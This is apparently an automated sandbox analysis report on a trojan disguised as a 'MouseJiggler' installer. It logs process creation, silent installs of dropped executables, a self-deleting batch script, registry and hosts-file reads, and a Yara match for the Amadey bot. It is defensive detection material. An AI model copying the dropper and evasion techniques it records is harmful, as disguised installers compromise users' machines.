          Source: sqconfig.exe, 00000018.00000002.404248328.000000006E7A3000.00000002.00020000.sdmpBinary or memory string: GetRawInputData

          System Summary:

          barindex
          PE file has a writeable .text sectionShow sources
          Source: is-4V3H8.tmp.14.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeCode function: 0_2_10001E100_2_10001E10
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeCode function: 0_2_100083000_2_10008300
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeCode function: 0_2_100077700_2_10007770
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004323DC9_2_004323DC
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004255DC9_2_004255DC
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_0040E9C49_2_0040E9C4
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_006B786C11_2_006B786C
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_0040C93811_2_0040C938
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 12_2_004323DC12_2_004323DC
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 12_2_004255DC12_2_004255DC
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 12_2_0040E9C412_2_0040E9C4
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: 14_2_006B786C14_2_006B786C
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: 14_2_0040C93814_2_0040C938
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeCode function: 19_2_013C3BF019_2_013C3BF0
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeCode function: 19_2_013C31C019_2_013C31C0
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeCode function: 19_2_013E2ED019_2_013E2ED0
          Source: MouseJiggler.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: libupdate.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: libupdate.tmp.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: libupdate.tmp.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: libupdate.tmp.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: libupdate.tmp.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: is-4V3H8.tmp.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: Ac372JNTO6.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,9_2_004AF110
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,11_2_0060F6D8
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 12_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,12_2_004AF110
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: 14_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,14_2_0060F6D8
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: String function: 005F5C7C appears 50 times
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: String function: 005F5F60 appears 62 times
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: String function: 005DE888 appears 40 times
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: String function: 00427848 appears 42 times
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: String function: 0040CC60 appears 34 times
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: String function: 0040873C appears 36 times
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: String function: 0060CD28 appears 31 times
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: String function: 005F5C7C appears 50 times
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: String function: 005F5F60 appears 62 times
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: String function: 005DE888 appears 40 times
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: String function: 006163B4 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: String function: 00616130 appears 39 times
          Source: libupdate.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
          Source: libupdate.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
          Source: Ac372JNTO6.exeBinary or memory string: OriginalFilename vs Ac372JNTO6.exe
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamessleay32.dllH vs Ac372JNTO6.exe
          Source: Ac372JNTO6.exe, 00000000.00000002.326145316.0000000002636000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamelibeay32.dllH vs Ac372JNTO6.exe
          Source: Ac372JNTO6.exe, 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamegentee.dll vs Ac372JNTO6.exe
          Source: Ac372JNTO6.exe, 00000000.00000002.327898708.0000000003ED4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMouseJiggle.exe8 vs Ac372JNTO6.exe
          Source: Ac372JNTO6.exeBinary or memory string: OriginalFilenameMouseJiggler.exe vs Ac372JNTO6.exe
          Source: MouseJiggler.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Ac372JNTO6.exeStatic PE information: Section: .gentee ZLIB complexity 0.996970533288
          Source: uninstall.exe.0.drStatic PE information: Section: .gentee ZLIB complexity 0.996970533288
          Source: Ac372JNTO6.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile created: C:\Users\user\Desktop\MouseJiggler.lnkJump to behavior
          Source: classification engineClassification label: mal54.troj.evad.winEXE@20/218@1/5
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004AF9F0 FindResourceW,SizeofResource,LoadResource,LockResource,9_2_004AF9F0
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile created: C:\Program Files (x86)\14522330092021378661Jump to behavior
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\deldll.bat' '
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
          Source: Ac372JNTO6.exeVirustotal: Detection: 20%
          Source: Ac372JNTO6.exeReversingLabs: Detection: 18%
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile read: C:\Users\user\Desktop\Ac372JNTO6.exeJump to behavior
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Ac372JNTO6.exe 'C:\Users\user\Desktop\Ac372JNTO6.exe'
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeProcess created: C:\Program Files (x86)\MouseJiggler\libupdate.exe C:\Program Files (x86)\MouseJiggler\libupdate.exe
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeProcess created: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmp 'C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmp' /SL5='$202B4,5001884,960512,C:\Program Files (x86)\MouseJiggler\libupdate.exe'
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpProcess created: C:\Program Files (x86)\MouseJiggler\libupdate.exe 'C:\Program Files (x86)\MouseJiggler\libupdate.exe' /VERYSILENT
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeProcess created: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp 'C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp' /SL5='$70264,5001884,960512,C:\Program Files (x86)\MouseJiggler\libupdate.exe' /VERYSILENT
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\deldll.bat' '
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe 'C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe 'C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe'
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeProcess created: C:\Program Files (x86)\MouseJiggler\libupdate.exe C:\Program Files (x86)\MouseJiggler\libupdate.exeJump to behavior
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\deldll.bat' 'Jump to behavior
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeProcess created: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmp 'C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmp' /SL5='$202B4,5001884,960512,C:\Program Files (x86)\MouseJiggler\libupdate.exe' Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpProcess created: C:\Program Files (x86)\MouseJiggler\libupdate.exe 'C:\Program Files (x86)\MouseJiggler\libupdate.exe' /VERYSILENTJump to behavior
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeProcess created: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp 'C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp' /SL5='$70264,5001884,960512,C:\Program Files (x86)\MouseJiggler\libupdate.exe' /VERYSILENTJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe 'C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1 Jump to behavior
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,9_2_004AF110
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,11_2_0060F6D8
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 12_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,12_2_004AF110
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: 14_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,14_2_0060F6D8
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile created: C:\Users\user\AppData\Local\Temp\genteert.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_0062CFB8 GetVersion,CoCreateInstance,11_2_0062CFB8
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_0041A4DC GetDiskFreeSpaceW,9_2_0041A4DC
          Source: libupdate.tmp, 0000000E.00000003.329848113.00000000053D1000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000000.328488534.00000000017FC000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000000.377873899.00000000017FC000.00000002.00020000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: libupdate.tmp, 0000000E.00000003.329848113.00000000053D1000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000000.328488534.00000000017FC000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000000.377873899.00000000017FC000.00000002.00020000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
          Source: libupdate.tmp, 0000000E.00000003.329848113.00000000053D1000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000000.328488534.00000000017FC000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000000.377873899.00000000017FC000.00000002.00020000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeMutant created: \Sessions\1\BaseNamedObjects\ci378661
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_01
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeMutant created: \Sessions\1\BaseNamedObjects\152138533219352125563209
          Source: libupdate.exeString found in binary or memory: Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file af
          Source: libupdate.exeString found in binary or memory: Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file af
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile written: C:\Program Files (x86)\MouseJiggler\uninstall.iniJump to behavior
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpWindow found: window name: TMainFormJump to behavior
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeAutomated click: Next >
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeAutomated click: Next >
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: sqconfig.exe, sqconfig.exe, 00000018.00000002.401692456.0000000003FEE000.00000004.00000001.sdmp
          Source: Binary string: C:\bamboo\bamboo-agent-home\xml-data\build-dir\APRIORITCSM-EEAI31-TRAY\src\CommonManaged\obj\Release\CommonManaged.pdbt source: is-TILI0.tmp.14.dr
          Source: Binary string: C:\Development\Wpf\pdb\agent\dll\pdb\SimpleDb\pdb\Calendar\emptyDll\Sy.pdbA source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000000.328551958.000000000186D000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000000.377941312.000000000186D000.00000002.00020000.sdmp
          Source: Binary string: C:\bamboo\bamboo-agent-home\xml-data\build-dir\APRIORITCSM-EEAI31-TRAY\src\UtilsLib\obj\Release\UtilsLib.pdb source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp
          Source: Binary string: C:\bamboo\bamboo-agent-home\xml-data\build-dir\APRIORITCSM-EEAI31-TRAY\src\CommonManaged\obj\Release\CommonManaged.pdb source: is-TILI0.tmp.14.dr
          Source: Binary string: C:\Development\Wpf\pdb\agent\dll\pdb\SimpleDb\pdb\Calendar\emptyDll\Sy.pdb source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000000.328551958.000000000186D000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000000.377941312.000000000186D000.00000002.00020000.sdmp
          Source: Binary string: D:\qt5_workdir\0_181\OfficeSuite\obj\obj\x86\Release_wdexe_75.pdb source: sqconfig.exe, 00000018.00000002.402951280.000000006E5BD000.00000002.00020000.sdmp
          Source: Binary string: C:\Workspace\MouseJiggle\obj\Release\MouseJiggle.pdb\ source: Ac372JNTO6.exe, 00000000.00000002.327898708.0000000003ED4000.00000004.00000001.sdmp
          Source: Binary string: C:\Workspace\MouseJiggle\obj\Release\MouseJiggle.pdb source: Ac372JNTO6.exe, 00000000.00000002.327898708.0000000003ED4000.00000004.00000001.sdmp
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004B5000 push 004B50DEh; ret 9_2_004B50D6
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004B5980 push 004B5A48h; ret 9_2_004B5A40
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_00458000 push ecx; mov dword ptr [esp], ecx9_2_00458005
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_0049B03C push ecx; mov dword ptr [esp], edx9_2_0049B03D
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004A00F8 push ecx; mov dword ptr [esp], edx9_2_004A00F9
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_00458084 push ecx; mov dword ptr [esp], ecx9_2_00458089
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004B1084 push 004B10ECh; ret 9_2_004B10E4
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004A1094 push ecx; mov dword ptr [esp], edx9_2_004A1095
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_0041A0B4 push ecx; mov dword ptr [esp], ecx9_2_0041A0B8
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004270BC push 00427104h; ret 9_2_004270FC
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_00458108 push ecx; mov dword ptr [esp], ecx9_2_0045810D
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004321C8 push ecx; mov dword ptr [esp], edx9_2_004321C9
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004A21D8 push ecx; mov dword ptr [esp], edx9_2_004A21D9
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_0049E1B8 push ecx; mov dword ptr [esp], edx9_2_0049E1B9
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_0049A260 push 0049A378h; ret 9_2_0049A370
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_00455268 push ecx; mov dword ptr [esp], ecx9_2_0045526C
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004252D4 push ecx; mov dword ptr [esp], eax9_2_004252D9
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004592FC push ecx; mov dword ptr [esp], edx9_2_004592FD
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_0045B284 push ecx; mov dword ptr [esp], edx9_2_0045B285
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_00430358 push ecx; mov dword ptr [esp], eax9_2_00430359
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_00430370 push ecx; mov dword ptr [esp], eax9_2_00430371
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_00459394 push ecx; mov dword ptr [esp], ecx9_2_00459398
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004A1428 push ecx; mov dword ptr [esp], edx9_2_004A1429
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_0049B424 push ecx; mov dword ptr [esp], edx9_2_0049B425
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004A24D8 push ecx; mov dword ptr [esp], edx9_2_004A24D9
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004224F0 push 004225F4h; ret 9_2_004225EC
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004304F0 push ecx; mov dword ptr [esp], eax9_2_004304F1
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_00499490 push ecx; mov dword ptr [esp], edx9_2_00499493
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_00458564 push ecx; mov dword ptr [esp], edx9_2_00458565
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_00458574 push ecx; mov dword ptr [esp], edx9_2_00458575
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_00457574 push ecx; mov dword ptr [esp], ecx9_2_00457578
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeCode function: 19_2_013CBE40 Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,GetUserNameW,GetComputerNameExW,19_2_013CBE40
          Source: Ac372JNTO6.exeStatic PE information: section name: .gentee
          Source: uninstall.exe.0.drStatic PE information: section name: .gentee
          Source: libupdate.exe.0.drStatic PE information: section name: .didata
          Source: libupdate.tmp.9.drStatic PE information: section name: .didata
          Source: libupdate.tmp.12.drStatic PE information: section name: .didata
          Source: is-TNQQD.tmp.14.drStatic PE information: section name: .sxdata
          Source: libupdate.tmp.12.drStatic PE information: real checksum: 0x0 should be: 0x32e81b
          Source: is-CLKBK.tmp.14.drStatic PE information: real checksum: 0x150fb7 should be: 0x16eca9
          Source: is-C2M67.tmp.14.drStatic PE information: real checksum: 0x0 should be: 0x11089
          Source: is-1HQQF.tmp.14.drStatic PE information: real checksum: 0x0 should be: 0x16a36
          Source: is-4V3H8.tmp.14.drStatic PE information: real checksum: 0x5e58f3 should be: 0x5efbfb
          Source: genteert.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x119e9
          Source: is-TNQQD.tmp.14.drStatic PE information: real checksum: 0x0 should be: 0x19469
          Source: uninstall.exe.0.drStatic PE information: real checksum: 0x101d26 should be: 0xfbae5
          Source: is-SQ21B.tmp.14.drStatic PE information: real checksum: 0x0 should be: 0xf2db
          Source: libupdate.tmp.9.drStatic PE information: real checksum: 0x0 should be: 0x32e81b
          Source: libupdate.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x5ab00a
          Source: guig.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xf97f
          Source: is-LV053.tmp.14.drStatic PE information: real checksum: 0x2fce1f should be: 0x31504c
          Source: MouseJiggler.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1477f
          Source: initial sampleStatic PE information: section name: .text entropy: 7.44669046665

          Persistence and Installation Behavior:

          barindex
          Yara detected Amadey botShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000013.00000002.546644069.0000000003A56000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: sqconfig.exe PID: 5836, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-JGRD7.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libfaac.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgpg-error-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-INUKO.tmpJump to dropped file
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile created: C:\Program Files (x86)\MouseJiggler\uninstall.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-C5HIV.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-1TNCV.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-JNHV3.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\Qt5SerialPort.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\DevExpress.Sparkline.v14.2.Core.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstapp-1.0-0.dll (copy)Jump to dropped file
